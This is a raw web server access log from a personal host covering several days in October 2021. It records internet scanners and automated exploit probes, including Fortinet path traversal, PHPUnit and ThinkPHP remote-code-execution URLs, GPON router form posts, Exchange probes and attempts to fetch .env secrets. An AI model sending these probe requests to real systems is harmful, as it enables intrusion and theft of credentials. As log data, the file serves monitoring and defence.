[Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:03:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [15/Oct/2021:17:05:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.133] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [15/Oct/2021:17:05:24 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.133] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:17:05:27 +0000] 400 - - https localhost "-" [Client 23.129.64.133] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:17:05:29 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.182] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:17:05:37 +0000] 400 - - https localhost "-" [Client 23.129.64.182] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:17:56:15 +0000] 400 - - http localhost "-" [Client 94.102.49.159] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:18:15:41 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 195.123.222.53] [Length 0] [Gzip -] "python-requests/2.25.1" "-" [15/Oct/2021:18:33:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:18:38:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:19:03:36 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:19:15:54 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:19:15:54 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:19:58:40 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:19:58:41 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:20:03:35 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:35 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:36 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:37 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:38 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:40 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:41 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Oct/2021:20:03:42 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:43 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:45 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Oct/2021:20:03:49 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:20:06:42 +0000] 400 - - https localhost "-" [Client 35.213.223.219] [Length 0] [Gzip -] "-" "-" [15/Oct/2021:20:26:48 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:20:26:48 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:21:17:47 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 178.128.244.253] [Length 0] [Gzip -] "curl/7.3.2" "-" [15/Oct/2021:21:50:06 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:21:50:06 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [15/Oct/2021:22:42:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Oct/2021:23:13:08 +0000] 400 - - http localhost "-" [Client 87.251.64.137] [Length 154] [Gzip -] "-" "-" [15/Oct/2021:23:13:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Oct/2021:23:48:13 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.101] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [15/Oct/2021:23:52:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [15/Oct/2021:23:52:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [15/Oct/2021:23:54:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.6] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [15/Oct/2021:23:58:54 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 34.86.35.26] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Oct/2021:01:11:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.68] [Length 0] [Gzip -] "-" "-" [16/Oct/2021:01:16:54 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Oct/2021:01:16:54 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [16/Oct/2021:01:23:51 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:01:30:27 +0000] 400 - - http localhost "-" [Client 45.83.66.105] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:02:04:41 +0000] 444 - GET https pop.moralanimal.net "/" [Client 34.86.35.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Oct/2021:03:18:24 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [16/Oct/2021:04:10:09 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [16/Oct/2021:04:18:48 +0000] 444 - GET https pop.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [16/Oct/2021:04:28:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [16/Oct/2021:04:49:35 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.86.35.15] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [16/Oct/2021:04:57:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:04:59:06 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.35] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:05:00:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:05:11:16 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:05:11:16 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:05:11:16 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:05:17:39 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Oct/2021:05:17:39 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [16/Oct/2021:05:42:37 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 178.128.244.253] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:05:42:39 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 178.128.244.253] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:05:50:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.58] [Length 0] [Gzip -] "-" "-" [16/Oct/2021:05:50:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "-" "-" [16/Oct/2021:05:50:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Oct/2021:06:40:24 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:07:27:30 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.200.92] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:08:22:05 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [16/Oct/2021:08:34:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:08:34:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:08:34:19 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:09:03:02 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [16/Oct/2021:10:07:17 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [16/Oct/2021:10:48:24 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:10:55:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:11:06:51 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:13:00:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.199.116] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [16/Oct/2021:13:11:07 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:13:20:17 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [16/Oct/2021:15:53:58 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [16/Oct/2021:15:56:45 +0000] 400 - GET http localhost "/" [Client 47.107.36.161] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:17:03:07 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Oct/2021:19:41:13 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:13 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:14 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:16 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [16/Oct/2021:19:41:16 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:18 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:20 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:20 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:22 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:19:41:24 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [16/Oct/2021:19:41:25 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [16/Oct/2021:21:12:30 +0000] 400 - POST http 192.168.0.1 "/GponForm/diag_Form?style/" [Client 209.141.36.13] [Length 154] [Gzip -] "curl/7.3.2" "-" [16/Oct/2021:21:35:12 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 23.95.191.195] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Oct/2021:01:25:23 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:02:19:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [17/Oct/2021:02:19:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [17/Oct/2021:02:19:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.142.236.43] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [17/Oct/2021:02:20:31 +0000] 400 - - https localhost "-" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:20:31 +0000] 400 - - https localhost "-" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:20:33 +0000] 400 - - https localhost "-" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:20:37 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:20:39 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:20:41 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 185.142.236.43] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:02:22:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [17/Oct/2021:02:34:53 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Oct/2021:02:38:36 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.9] [Length 0] [Gzip -] "Go http package" "-" [17/Oct/2021:02:49:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [17/Oct/2021:02:51:57 +0000] 444 - GET https account.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:02:51:57 +0000] 444 - GET https ecommerce.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:02:51:57 +0000] 444 - GET https main.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:02:51:57 +0000] 444 - GET https old.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:02:51:57 +0000] 444 - GET https events.moralanimal.net "/.env" [Client 213.238.178.239] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [17/Oct/2021:04:14:55 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.3.154.35] [Length 0] [Gzip -] "curl/7.3.2" "-" [17/Oct/2021:04:38:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.82.47.4] [Length 0] [Gzip -] "-" "-" [17/Oct/2021:04:59:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:04:59:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:05:00:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Oct/2021:07:13:36 